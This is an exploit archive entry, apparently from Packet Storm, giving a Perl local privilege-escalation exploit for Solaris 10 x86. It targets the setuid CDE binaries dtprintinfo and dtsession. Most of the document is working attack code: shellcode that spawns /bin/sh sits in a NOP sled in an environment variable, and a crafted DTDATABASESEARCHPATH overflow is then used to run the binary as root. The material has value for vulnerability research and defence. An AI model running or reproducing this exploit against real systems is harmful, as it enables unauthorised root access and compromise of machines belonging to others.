
x_dtsuids.pl.txt

Posted Nov 8, 2005
Authored by Charles Stevenson

Solaris 10 DtPrintinfo/Session exploit for x86.

tags | exploit, x86
systems | solaris
MD5 | 3eac0baa42e886142249fb50bf8cc94b

#!/usr/bin/perl 
#######################################################################
#
# Solaris 10 DtPrintinfo/Session Exploit (x86)
#
# EDUCATIONAL purposes only.... :-)
#
# by Charles Stevenson (core) <core@bokeoa.com>
#
# greetz to raptor for sharing this vulnerability and in no specific
# order just want to show love for: nemo, andrewg, jduck, bannedit,
# runixd, charbuff, sloth, ktha, KF, akt0r, MRX, salvia, etc.
#
# irc.pulltheplug.org (#social)
# 0dd: much <3 & respect
#
# 10/12/05 - FF local root
#
#######################################################################
# PRIVATE - DO NOT DISTRIBUTE - PRIVATE #
#######################################################################

#You can try lots of dt* suids. I'm too lazy to code the loop ;-o
$dtsuid = "dtprintinfo";
#$dtsuid = "dtsession";

$sc = "\x90" x (511-108) .

# anathema <anathema@hack.co.za>
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04".
"\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5e".
"\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50".
"\xb0\x8d\xe8\xe0\xff\xff\xff\x29\xc0".
"\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb".
"\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0".
"\x88\x46\x19\x89\x46\x14\x89\x46\x0f".
"\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51".
"\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff".
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01".
"\x01\x01\x01\x02\x02\x02\x02\x03\x03".
"\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

print "\n\n$dtsuid root exploit\n";
print "----------------------------------------------\n";
print "Written by Charles Stevenson <core\@bokeoa.com>\n\n";

# Clear out the environment.
foreach $key (keys %ENV) { delete $ENV{$key}; }

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc";
$ENV{"TERM"} = "xterm";
$ENV{"DISPLAY"} = "127.0.0.1:0";
$ENV{"PATH"} = "/usr/dt/bin:/bin:/sbin:/usr/sbin:/usr/bin";

# Create the payload...
#$ENV{"DTDATABASESEARCHPATH"} = "////" . "ABCD"x360; # raptor
$ENV{"DTDATABASESEARCHPATH"} = "////" . pack("l",0x8047890)x360;


# If you don't get root try other dt setuid binaries
print "Trying to own $dtsuid...\n";
system("/usr/dt/bin/$dtsuid");

# EOF

© 2019 Packet Storm. All rights reserved.
